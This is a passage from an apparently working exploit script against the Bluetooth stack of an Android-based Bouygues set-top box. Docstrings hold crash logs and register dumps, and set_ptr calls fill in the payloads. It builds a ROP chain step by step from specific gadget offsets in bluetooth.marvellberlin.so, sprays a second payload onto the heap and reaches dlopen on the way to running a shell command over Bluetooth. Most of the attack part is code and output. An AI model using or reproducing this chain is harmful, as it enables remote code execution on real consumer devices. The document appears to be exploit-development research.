        07-20 09:28:01.229 21061 21061 F DEBUG   :     #05 pc 000e6607  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z17btu_hci_msg_readyP13fixed_queue_tPv+42)
        07-20 09:28:01.229 21061 21061 F DEBUG   :     #06 pc 001290df  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL22internal_dequeue_readyPv+46)
        07-20 09:28:01.229 21061 21061 F DEBUG   :     #07 pc 0012b535  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL11run_reactorP9reactor_ti+216)
        07-20 09:28:01.229 21061 21061 F DEBUG   :     #08 pc 0012b431  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z13reactor_startP9reactor_t+44)
        07-20 09:28:01.229 21061 21061 F DEBUG   :     #09 pc 0012c729  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL10run_threadPv+136)
        07-20 09:28:01.229 21061 21061 F DEBUG   :     #10 pc 00047f17  /system/lib/libc.so (_ZL15__pthread_startPv+22)
        07-20 09:28:01.229 21061 21061 F DEBUG   :     #11 pc 0001b1dd  /system/lib/libc.so (__start_thread+32)

        Signal:
        .text:0x1298E0                 LDR             R0, [R4,#0x10]                          => Load R0 from R4 + 0x10                       => R4 = first payload address - 0x4 | R0 = first payload value + 0xC
        .text:0x1298E2                 LDR             R1, [R0]                                => Load R1 from R0                              => R0 = first payload value + 0xC   | CRASH
        .text:0x1298E4                 MOVS            R0, #8                                  => Set 0x8 in R0                                => R0 = 0x8
        .text:0x1298E6                 BLX             R1                                      => Branch to R1                                 => Branch to R1 = second payload value + 0x0
        
        We know from the source code analyse that the target crash in list_append function with R4 pointing to list_t* p_lcb->link_xmit_data_q and R5 to BT_HDR* p_buf which contain also the second payload
        
        # void l2c_link_check_send_pkts(tL2C_LCB* p_lcb, tL2C_CCB* p_ccb, BT_HDR* p_buf) {
        # ...
        #     list_append(p_lcb->link_xmit_data_q, p_buf);
        # ...
        # }

        After the signal the registers contains:
        
        - R1 = dead0033 = second payload value + 0xB0
        - R2 = 8970a200 = address of BT_HDR* p_buff with the second payload at + 0x8
        - R5 = 8970a200 = address of BT_HDR* p_buff with the second payload at + 0x8
        - R4 = a4585c38 = address of list_t* p_lcb->link_xmit_data_q with the first payload + 0x0
        - PC = dead0032 = second payload value + 0xB0 - 0x1

        We see that PC = dead0032 which is in fact second payload value + 0xB0 minus 0x1 for the thumb mode which is equal to R1
        
        We also see that when we send second payload at mem_offset 184 R1 = dead0033 = second payload value + 0xB0
        For ease we will offset the address of second payload base from 0xB0 in order to set R0 to address of second payload - 0xB0 and set R1 with second payload value + 0x0
        
        We now need to use a gadget that load other registers from R4 with the first payload values + 0x0 and control PC to continue the ROP
        
        Gadget 1:
        0x000a2a38 : ldmib r4, {r2, r4, r5, r7, pc} ^

        This gadget will load:
        
        - R2       = R4 + 0x0  = first payload value + 0x0
        - R4       = R4 + 0x4  = first payload value + 0x4
        - R5       = R4 + 0x8  = first payload value + 0x8
        - R7       = R4 + 0xC  = first payload value + 0xC = address of gadget 1
        - R15 (PC) = R4 + 0x10 = first payload value + 0x10
        """
        
        # Set second payload base address to found link transmit data buffer queue address - 0xB0
        second_payload_base = link_xmit_data_q_entry_address - 0xB0

        # Set R1 for signal: Place the address of gadget 1 in second payload value + 0x0
        set_ptr( second_payload_ptr, 0x0, bluetooth_library_base_address + 0x000a2a38, payload=2)

        # Set R4 for gadget 1: Place the address of second payload + 0x0 in first payload value + 0xC
        set_ptr( first_payload_ptr, 0xC, second_payload_base + 0x0, payload=1)

        """
        The target crash with following log:
        
        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        Found link transmit data buffer queue pointer 0 at 0xb308d224
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x98fafb29
        HCI: Found bte_hh_evt function at 0x98f52429
        HCI: Found bluetooth library base address at 0x98eda000
        Building the payloads...
        Adding shell command "touch /data/local/tmp/test" of length 28 at 0xb308d210 in second payload
        First payload:
          0x00: dead0000 | 0x04: dead0001 | 0x08: dead0002 | 0x0c: b308d174
          0x10: dead0003 | 0x14: dead0004 | 0x18: dead0005 | 0x1c: dead0006
        Second payload:
          0x00 : b308d174 : 98f7ca38 | 0x04 : b308d178 : dead0007 | 0x08 : b308d17c : dead0008 | 0x0c : b308d180 : dead0009
          0x10 : b308d184 : dead000a | 0x14 : b308d188 : dead000b | 0x18 : b308d18c : dead000c | 0x1c : b308d190 : dead000d
          0x20 : b308d194 : dead000e | 0x24 : b308d198 : dead000f | 0x28 : b308d19c : dead0010 | 0x2c : b308d1a0 : dead0011
          0x30 : b308d1a4 : dead0012 | 0x34 : b308d1a8 : dead0013 | 0x38 : b308d1ac : dead0014 | 0x3c : b308d1b0 : dead0015
          0x40 : b308d1b4 : dead0016 | 0x44 : b308d1b8 : dead0017 | 0x48 : b308d1bc : dead0018 | 0x4c : b308d1c0 : dead0019
          0x50 : b308d1c4 : dead001a | 0x54 : b308d1c8 : dead001b | 0x58 : b308d1cc : dead001c | 0x5c : b308d1d0 : dead001d
          0x60 : b308d1d4 : dead001e | 0x64 : b308d1d8 : dead001f | 0x68 : b308d1dc : dead0020 | 0x6c : b308d1e0 : dead0021
          0x70 : b308d1e4 : dead0022 | 0x74 : b308d1e8 : dead0023 | 0x78 : b308d1ec : dead0024 | 0x7c : b308d1f0 : dead0025
          0x80 : b308d1f4 : dead0026 | 0x84 : b308d1f8 : dead0027 | 0x88 : b308d1fc : dead0028 | 0x8c : b308d200 : dead0029
          0x90 : b308d204 : dead002a | 0x94 : b308d208 : dead002b | 0x98 : b308d20c : dead002c | 0x9c : b308d210 : 63756f74
          0xa0 : b308d214 : 642f2068 | 0xa4 : b308d218 : 2f617461 | 0xa8 : b308d21c : 61636f6c | 0xac : b308d220 : 6d742f6c
          0xb0 : b308d224 : 65742f70 | 0xb4 : b308d228 : 00007473
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xb308d174
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (1/20)                                                                                                                            
        ADB: Found interesting crash !!!
        07-24 12:01:56.129   556   704 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0000 in tid 704 (bt_workqueue)
        07-24 12:01:56.406  4034  4034 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-24 12:01:56.406  4034  4034 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-24 12:01:56.406  4034  4034 F DEBUG   : Revision: '0'
        07-24 12:01:56.406  4034  4034 F DEBUG   : ABI: 'arm'
        07-24 12:01:56.406  4034  4034 F DEBUG   : pid: 556, tid: 704, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-24 12:01:56.406  4034  4034 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0000
        07-24 12:01:56.406  4034  4034 F DEBUG   :     r0 00000008  r1 98f7ca38  r2 dead0000  r3 00000000
        07-24 12:01:56.406  4034  4034 F DEBUG   :     r4 dead0001  r5 dead0002  r6 00000000  r7 b308d174
        07-24 12:01:56.406  4034  4034 F DEBUG   :     r8 00000000  r9 97a7f340  sl 97a7f338  fp 00000001
        07-24 12:01:56.406  4034  4034 F DEBUG   :     ip b51db0ec  sp 97a7efd8  lr 990038e9  pc dead0000  cpsr 00000010
        07-24 12:01:56.566  4034  4034 F DEBUG   : 
        07-24 12:01:56.566  4034  4034 F DEBUG   : backtrace:
        07-24 12:01:56.566  4034  4034 F DEBUG   :     #00 pc dead0000  <unknown>
        07-24 12:01:56.566  4034  4034 F DEBUG   :     #01 pc 001298e7  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z11list_appendP6list_tPv+70)
        07-24 12:01:56.566  4034  4034 F DEBUG   :     #02 pc 0010312d  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z24l2c_link_check_send_pktsP12t_l2c_linkcbP9t_l2c_ccbP6BT_HDR+36)
        07-24 12:01:56.566  4034  4034 F DEBUG   :     #03 pc 0010298f  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z22l2c_link_hci_conn_comphtPh+78)
        07-24 12:01:56.566  4034  4034 F DEBUG   :     #04 pc 000e5371  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z22btu_hcif_process_eventhP6BT_HDR+440)
        07-24 12:01:56.567  4034  4034 F DEBUG   :     #05 pc 000e6607  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z17btu_hci_msg_readyP13fixed_queue_tPv+42)
        07-24 12:01:56.567  4034  4034 F DEBUG   :     #06 pc 001290df  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL22internal_dequeue_readyPv+46)
        07-24 12:01:56.567  4034  4034 F DEBUG   :     #07 pc 0012b535  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL11run_reactorP9reactor_ti+216)
        07-24 12:01:56.567  4034  4034 F DEBUG   :     #08 pc 0012b431  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z13reactor_startP9reactor_t+44)
        07-24 12:01:56.567  4034  4034 F DEBUG   :     #09 pc 0012c729  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL10run_threadPv+136)
        07-24 12:01:56.567  4034  4034 F DEBUG   :     #10 pc 00047f17  /system/lib/libc.so (_ZL15__pthread_startPv+22)
        07-24 12:01:56.567  4034  4034 F DEBUG   :     #11 pc 0001b1dd  /system/lib/libc.so (__start_thread+32)

        After the gadget 1 the registers contains:
        
        - R1       = 98f7ca38       = second payload value + 0x0 = address of gadget 1
        - R2       = dead0000       = first payload value  + 0x0
        - R4       = dead0001       = first payload value  + 0x4
        - R5       = dead0002       = first payload value  + 0x8
        - R7       = b308d174       = first payload value  + 0xC = address of second payload + 0x0 = address of gadget 1
        - PC (PC)  = dead0000 + 0x3 = first payload value  + 0x10
        
        We now need a gadget that will load other registers from R4 with the first payload value + 0x4 and control PC to continue the ROP
        
        Gadget 2:
        0x000a2098 : ldmib r4, {r0, r1, ip, pc} ^
        
        By setting R4 to second payload value + 0x4 - 0x4 for the increment before this gadget will load:
        
        - R0       = R4 + 0x4  = second payload value + 0x4
        - R1       = R4 + 0x8  = second payload value + 0x8
        - R12 (IP) = R4 + 0xC  = second payload value + 0xC
        - R15 (PC) = R4 + 0x10 = second payload value + 0x10
        
        Reminder for gadget 1:
        0x000a2a38 : ldmib r4, {r2, r4, r5, r7, pc} ^
        """
        
        # Set PC of gadget 1: Place the address of gadget 2 in first payload value + 0x10
        set_ptr( first_payload_ptr, 0x10, bluetooth_library_base_address + 0x000a2098, payload=1)

        # Set R4 for gadget 2: Place the address of second payload + 0x4 - 0x4 for the increment before in first payload value + 0x4
        set_ptr( first_payload_ptr, 0x4, second_payload_base + 0x4 - 0x4, payload=1)

        """
        The target crash with following log:
        
        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x95d81b29
        HCI: Found bte_hh_evt function at 0x95d24429
        HCI: Found bluetooth library base address at 0x95cac000
        Building the payloads...
        Adding shell command "touch /data/local/tmp/test" of length 28 at 0xafd8e550 in second payload
        First payload:
          0x00: dead0000 | 0x04: afd8e4b4 | 0x08: dead0001 | 0x0c: afd8e4b4
          0x10: 95d4e098 | 0x14: dead0002 | 0x18: dead0003 | 0x1c: dead0004
        Second payload:
          0x00 : afd8e4b4 : 95d4ea38 | 0x04 : afd8e4b8 : dead0005 | 0x08 : afd8e4bc : dead0006 | 0x0c : afd8e4c0 : dead0007
          0x10 : afd8e4c4 : dead0008 | 0x14 : afd8e4c8 : dead0009 | 0x18 : afd8e4cc : dead000a | 0x1c : afd8e4d0 : dead000b
          0x20 : afd8e4d4 : dead000c | 0x24 : afd8e4d8 : dead000d | 0x28 : afd8e4dc : dead000e | 0x2c : afd8e4e0 : dead000f
          0x30 : afd8e4e4 : dead0010 | 0x34 : afd8e4e8 : dead0011 | 0x38 : afd8e4ec : dead0012 | 0x3c : afd8e4f0 : dead0013
          0x40 : afd8e4f4 : dead0014 | 0x44 : afd8e4f8 : dead0015 | 0x48 : afd8e4fc : dead0016 | 0x4c : afd8e500 : dead0017
          0x50 : afd8e504 : dead0018 | 0x54 : afd8e508 : dead0019 | 0x58 : afd8e50c : dead001a | 0x5c : afd8e510 : dead001b
          0x60 : afd8e514 : dead001c | 0x64 : afd8e518 : dead001d | 0x68 : afd8e51c : dead001e | 0x6c : afd8e520 : dead001f
          0x70 : afd8e524 : dead0020 | 0x74 : afd8e528 : dead0021 | 0x78 : afd8e52c : dead0022 | 0x7c : afd8e530 : dead0023
          0x80 : afd8e534 : dead0024 | 0x84 : afd8e538 : dead0025 | 0x88 : afd8e53c : dead0026 | 0x8c : afd8e540 : dead0027
          0x90 : afd8e544 : dead0028 | 0x94 : afd8e548 : dead0029 | 0x98 : afd8e54c : dead002a | 0x9c : afd8e550 : 63756f74
          0xa0 : afd8e554 : 642f2068 | 0xa4 : afd8e558 : 2f617461 | 0xa8 : afd8e55c : 61636f6c | 0xac : afd8e560 : 6d742f6c
          0xb0 : afd8e564 : 65742f70 | 0xb4 : afd8e568 : 00007473
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xafd8e4b4
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (2/20)                                                                                                                            
        ADB: Found interesting crash !!!
        07-24 12:32:55.417  4101  4151 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0008 in tid 4151 (bt_workqueue)
        07-24 12:32:55.640  4200  4200 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-24 12:32:55.641  4200  4200 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-24 12:32:55.641  4200  4200 F DEBUG   : Revision: '0'
        07-24 12:32:55.641  4200  4200 F DEBUG   : ABI: 'arm'
        07-24 12:32:55.641  4200  4200 F DEBUG   : pid: 4101, tid: 4151, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-24 12:32:55.641  4200  4200 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0008
        07-24 12:32:55.641  4200  4200 F DEBUG   :     r0 dead0005  r1 dead0006  r2 dead0000  r3 00000000
        07-24 12:32:55.641  4200  4200 F DEBUG   :     r4 afd8e4b4  r5 dead0001  r6 00000000  r7 afd8e4b4
        07-24 12:32:55.641  4200  4200 F DEBUG   :     r8 00000000  r9 9496c340  sl 9496c338  fp 00000001
        07-24 12:32:55.641  4200  4200 F DEBUG   :     ip dead0007  sp 9496bfd8  lr 95dd58e9  pc dead0008  cpsr 00000010
        07-24 12:32:55.803  4200  4200 F DEBUG   : 
        07-24 12:32:55.803  4200  4200 F DEBUG   : backtrace:
        07-24 12:32:55.803  4200  4200 F DEBUG   :     #00 pc dead0008  <unknown>
        07-24 12:32:55.803  4200  4200 F DEBUG   :     #01 pc 001298e7  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z11list_appendP6list_tPv+70)
        07-24 12:32:55.804  4200  4200 F DEBUG   :     #02 pc 0010312d  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z24l2c_link_check_send_pktsP12t_l2c_linkcbP9t_l2c_ccbP6BT_HDR+36)
        07-24 12:32:55.804  4200  4200 F DEBUG   :     #03 pc 0010298f  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z22l2c_link_hci_conn_comphtPh+78)
        07-24 12:32:55.804  4200  4200 F DEBUG   :     #04 pc 000e5371  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z22btu_hcif_process_eventhP6BT_HDR+440)
        07-24 12:32:55.804  4200  4200 F DEBUG   :     #05 pc 000e6607  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z17btu_hci_msg_readyP13fixed_queue_tPv+42)
        07-24 12:32:55.804  4200  4200 F DEBUG   :     #06 pc 001290df  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL22internal_dequeue_readyPv+46)
        07-24 12:32:55.804  4200  4200 F DEBUG   :     #07 pc 0012b535  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL11run_reactorP9reactor_ti+216)
        07-24 12:32:55.804  4200  4200 F DEBUG   :     #08 pc 0012b431  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z13reactor_startP9reactor_t+44)
        07-24 12:32:55.804  4200  4200 F DEBUG   :     #09 pc 0012c729  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_ZL10run_threadPv+136)
        07-24 12:32:55.804  4200  4200 F DEBUG   :     #10 pc 00047f17  /system/lib/libc.so (_ZL15__pthread_startPv+22)
        07-24 12:32:55.805  4200  4200 F DEBUG   :     #11 pc 0001b1dd  /system/lib/libc.so (__start_thread+32)
    
        After the gadget 2 the registers contains:
        
        - R0       = dead0005 = second payload value + 0x4
        - R1       = dead0006 = second payload value + 0x8
        - R2       = dead0000 = first payload value  + 0x0
        - R4       = afd8e4b4 = first payload value  + 0x4 = address of second payload + 0x0 = address to load with increment before in gadget 2
        - R5       = dead0001 = first payload value  + 0x8
        - R7       = afd8e4b4 = first payload value  + 0xC = address of second payload + 0x0 = address of gadget 1
        - R12 (IP) = dead0007 = second payload value + 0xC
        - R15 (PC) = dead0008 = second payload value + 0x10
        
        We have R0, R1, IP and PC under control

        The dlopen function take the 2 parameters const char *filename and int flag to retrieve the library handle:   
        void *dlopen(const char *filename, int flag);

        But we can call it the lazy way with:
        handle = dlopen (NULL, RTLD_LAZY);    
        With RTLD_LAZY = 0x000001        /* Lazy function call binding.  */

        Before calling dlopen function to get libc handle we need a gadget that will load LR and PC in order to control return PC from the function
        
        Gadget 3:
        0x0013d3f0 : ldmib ip, {r1, r2, r3, ip, lr, pc} ^
        
        By setting IP to second payload value + 0x8 - 0x4 for the increment before this gadget will load:
        
        - R1       = IP + 0x4  = second payload value + 0x8
        - R2       = IP + 0x8  = second payload value + 0xC
        - R3       = IP + 0xC  = second payload value + 0x10
        - R12 (IP) = IP + 0x10 = second payload value + 0x14
        - R14 (LR) = IP + 0x14 = second payload value + 0x18
        - R15 (PC) = IP + 0x18 = second payload value + 0x1C

        This gadget allow to reload R1 with the same value and control LR and PC

        Reminder for gadget 2:
        0x000a2098 : ldmib r4, {r0, r1, ip, pc} ^
        """
        
        # Set PC of gadget 2: Place the address of gadget 2 in second payload value + 0x10
        set_ptr( second_payload_ptr, 0x10, bluetooth_library_base_address + 0x0013d3f0, payload=2)
        
        # Set IP for gadget 3: Place the address of second payload + 0x8 - 0x4 for increment in second payload value + 0xC
        set_ptr( second_payload_ptr, 0xC, second_payload_base + 0x8 - 0x4, payload=2)
        
        """
        The target crash with following log:
        
        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        Found link transmit data buffer queue pointer 0 at 0xa7e8dbc4
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x8df11b29
        HCI: Found bte_hh_evt function at 0x8deb4429
        HCI: Found bluetooth library base address at 0x8de3c000
        Building the payloads...
        Adding shell command "touch /data/local/tmp/test" of length 28 at 0xa7e8dbb0 in second payload
        First payload:
          0x00: dead0000 | 0x04: a7e8db14 | 0x08: dead0001 | 0x0c: a7e8db14
          0x10: 8dede098 | 0x14: dead0002 | 0x18: dead0003 | 0x1c: dead0004
        Second payload:
          0x00 : a7e8db14 : 8dedea38 | 0x04 : a7e8db18 : dead0005 | 0x08 : a7e8db1c : dead0006 | 0x0c : a7e8db20 : a7e8db18
          0x10 : a7e8db24 : 8df793f0 | 0x14 : a7e8db28 : dead0007 | 0x18 : a7e8db2c : dead0008 | 0x1c : a7e8db30 : dead0009
          0x20 : a7e8db34 : dead000a | 0x24 : a7e8db38 : dead000b | 0x28 : a7e8db3c : dead000c | 0x2c : a7e8db40 : dead000d
          0x30 : a7e8db44 : dead000e | 0x34 : a7e8db48 : dead000f | 0x38 : a7e8db4c : dead0010 | 0x3c : a7e8db50 : dead0011
          0x40 : a7e8db54 : dead0012 | 0x44 : a7e8db58 : dead0013 | 0x48 : a7e8db5c : dead0014 | 0x4c : a7e8db60 : dead0015
          0x50 : a7e8db64 : dead0016 | 0x54 : a7e8db68 : dead0017 | 0x58 : a7e8db6c : dead0018 | 0x5c : a7e8db70 : dead0019
          0x60 : a7e8db74 : dead001a | 0x64 : a7e8db78 : dead001b | 0x68 : a7e8db7c : dead001c | 0x6c : a7e8db80 : dead001d
          0x70 : a7e8db84 : dead001e | 0x74 : a7e8db88 : dead001f | 0x78 : a7e8db8c : dead0020 | 0x7c : a7e8db90 : dead0021
          0x80 : a7e8db94 : dead0022 | 0x84 : a7e8db98 : dead0023 | 0x88 : a7e8db9c : dead0024 | 0x8c : a7e8dba0 : dead0025
          0x90 : a7e8dba4 : dead0026 | 0x94 : a7e8dba8 : dead0027 | 0x98 : a7e8dbac : dead0028 | 0x9c : a7e8dbb0 : 63756f74
          0xa0 : a7e8dbb4 : 642f2068 | 0xa4 : a7e8dbb8 : 2f617461 | 0xa8 : a7e8dbbc : 61636f6c | 0xac : a7e8dbc0 : 6d742f6c
          0xb0 : a7e8dbc4 : 65742f70 | 0xb4 : a7e8dbc8 : 00007473
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xa7e8db14
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (11/20)                                                                                                                           
        ADB: Found interesting crash !!!
        07-24 13:15:52.150  8222  8258 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0008 in tid 8258 (bt_workqueue)
        07-24 13:15:52.298  8305  8305 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-24 13:15:52.299  8305  8305 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-24 13:15:52.299  8305  8305 F DEBUG   : Revision: '0'
        07-24 13:15:52.299  8305  8305 F DEBUG   : ABI: 'arm'
        07-24 13:15:52.299  8305  8305 F DEBUG   : pid: 8222, tid: 8258, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-24 13:15:52.299  8305  8305 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0008
        07-24 13:15:52.299  8305  8305 F DEBUG   :     r0 dead0005  r1 dead0006  r2 a7e8db18  r3 8df793f0
        07-24 13:15:52.300  8305  8305 F DEBUG   :     r4 a7e8db14  r5 dead0001  r6 00000011  r7 a7e8db14
        07-24 13:15:52.300  8305  8305 F DEBUG   :     r8 a7e85140  r9 00000006  sl 00000002  fp 8e0b88d4
        07-24 13:15:52.300  8305  8305 F DEBUG   :     ip dead0007  sp 8cc83fa0  lr dead0008  pc dead0008  cpsr 00000010
        07-24 13:15:52.303  8305  8305 F DEBUG   : 
        07-24 13:15:52.303  8305  8305 F DEBUG   : backtrace:
        07-24 13:15:52.303  8305  8305 F DEBUG   :     #00 pc dead0008  <unknown>

        After the gadget 3 the registers contains:
        
        - R0       = dead0005       = second payload value + 0x4
        - R1       = dead0006       = second payload value + 0x8
        - R2       = a7e8db18       = second payload value + 0xC  = address of second payload + 0x4 = address to load with increment before in gadget 3
        - R3       = 8df793f0       = second payload value + 0x10 = address of gadget 2
        - R4       = a7e8db14       = first payload value  + 0x4  = address of second payload + 0x0 = address to load with increment before in gadget 2
        - R5       = dead0001       = first payload value  + 0x8
        - R7       = a7e8db14       = first payload value  + 0xC  = address of second payload + 0x0 = address of gadget 1
        - R12 (IP) = dead0007       = second payload value + 0x14
        - R14 (LR) = dead0008       = second payload value + 0x18
        - R15 (PC) = dead0008 + 0x1 = second payload value + 0x1C
        
        We control R0, R1 ,LR and PC so we can now call dlopen to get libc handle
        
        For this we will set following registers:
        
        - R0       = second payload value + 0x4  = NULL           
        - R1       = second payload value + 0x8  = 0x00000001     
        - R14 (LR) = second payload value + 0x18 = address of gadget 4
        - R15 (PC) = second payload value + 0x1C = address of dlopen function in relocation table
       
        dlopen:
        .plt:0x000152E0 ; void *dlopen(const char *file, int mode)
        .plt:0x000152E0 dlopen                                  ; CODE XREF: sub_AEB84+1Ap
        .plt:0x000152E0                                         ; sub_AF580+1Ap ...
        .plt:0x000152E0                 ADRL            R12, 0x1A22E8
        .plt:0x000152E8                 LDR             PC, [R12,#(dlopen_ptr - 0x1A22E8)]! ; __imp_dlopen        
        
        Reminder for gadget 3:
        0x0013d3f0 : ldmib ip, {r1, r2, r3, ip, lr, pc} ^
        """
        
        # Set PC for gadget 3: Place the address of dlopen function in second payload value + 0x1C
        set_ptr( second_payload_ptr, 0x1C, bluetooth_library_base_address + 0x000152E0, payload=2)

        # Set R0 for dlopen function: Place NULL in second payload value + 0x4
        set_ptr( second_payload_ptr, 0x4, 0x00000000, payload=2)
        
        # Set R1 for dlopen function: Place RTLD_LAZY in second payload value + 0x8
        set_ptr( second_payload_ptr, 0x8, 0x00000001, payload=2)

        """
        The target crash with following log:
        
        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x981c0b29
        HCI: Found bte_hh_evt function at 0x98163429
        HCI: Found bluetooth library base address at 0x980eb000
        Building the payloads...
        Adding shell command "touch /data/local/tmp/test" of length 28 at 0xb208e550 in second payload
        First payload:
          0x00: dead0000 | 0x04: b208e4b4 | 0x08: dead0001 | 0x0c: b208e4b4
          0x10: 9818d098 | 0x14: dead0002 | 0x18: dead0003 | 0x1c: dead0004
        Second payload:
          0x00 : b208e4b4 : 9818da38 | 0x04 : b208e4b8 : 00000000 | 0x08 : b208e4bc : 00000001 | 0x0c : b208e4c0 : b208e4b8
          0x10 : b208e4c4 : 982283f0 | 0x14 : b208e4c8 : dead0005 | 0x18 : b208e4cc : dead0006 | 0x1c : b208e4d0 : 981002e0
          0x20 : b208e4d4 : dead0007 | 0x24 : b208e4d8 : dead0008 | 0x28 : b208e4dc : dead0009 | 0x2c : b208e4e0 : dead000a
          0x30 : b208e4e4 : dead000b | 0x34 : b208e4e8 : dead000c | 0x38 : b208e4ec : dead000d | 0x3c : b208e4f0 : dead000e
          0x40 : b208e4f4 : dead000f | 0x44 : b208e4f8 : dead0010 | 0x48 : b208e4fc : dead0011 | 0x4c : b208e500 : dead0012
          0x50 : b208e504 : dead0013 | 0x54 : b208e508 : dead0014 | 0x58 : b208e50c : dead0015 | 0x5c : b208e510 : dead0016
          0x60 : b208e514 : dead0017 | 0x64 : b208e518 : dead0018 | 0x68 : b208e51c : dead0019 | 0x6c : b208e520 : dead001a
          0x70 : b208e524 : dead001b | 0x74 : b208e528 : dead001c | 0x78 : b208e52c : dead001d | 0x7c : b208e530 : dead001e
          0x80 : b208e534 : dead001f | 0x84 : b208e538 : dead0020 | 0x88 : b208e53c : dead0021 | 0x8c : b208e540 : dead0022
          0x90 : b208e544 : dead0023 | 0x94 : b208e548 : dead0024 | 0x98 : b208e54c : dead0025 | 0x9c : b208e550 : 63756f74
          0xa0 : b208e554 : 642f2068 | 0xa4 : b208e558 : 2f617461 | 0xa8 : b208e55c : 61636f6c | 0xac : b208e560 : 6d742f6c
          0xb0 : b208e564 : 65742f70 | 0xb4 : b208e568 : 00007473
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xb208e4b4
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (6/20)                                                                                                                            
        ADB: Found interesting crash !!!
        07-24 13:40:31.111  6248  6282 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0004 in tid 6282 (bt_workqueue)
        07-24 13:40:31.273  6330  6330 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-24 13:40:31.273  6330  6330 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-24 13:40:31.273  6330  6330 F DEBUG   : Revision: '0'
        07-24 13:40:31.273  6330  6330 F DEBUG   : ABI: 'arm'
        07-24 13:40:31.273  6330  6330 F DEBUG   : pid: 6248, tid: 6282, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-24 13:40:31.274  6330  6330 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0004
        07-24 13:40:31.274  6330  6330 F DEBUG   :     r0 9f002101  r1 00004001  r2 00000000  r3 b5928dd0
        07-24 13:40:31.274  6330  6330 F DEBUG   :     r4 b208e4b4  r5 dead0001  r6 00000000  r7 b208e4b4
        07-24 13:40:31.274  6330  6330 F DEBUG   :     r8 00000000  r9 96dfd340  sl 96dfd338  fp 00000001
        07-24 13:40:31.274  6330  6330 F DEBUG   :     ip 00000000  sp 96dfcfd8  lr b59843bb  pc dead0004  cpsr 80000010
        07-24 13:40:31.279  6330  6330 F DEBUG   : 
        07-24 13:40:31.279  6330  6330 F DEBUG   : backtrace:
        07-24 13:40:31.279  6330  6330 F DEBUG   :     #00 pc dead0004  <unknown>
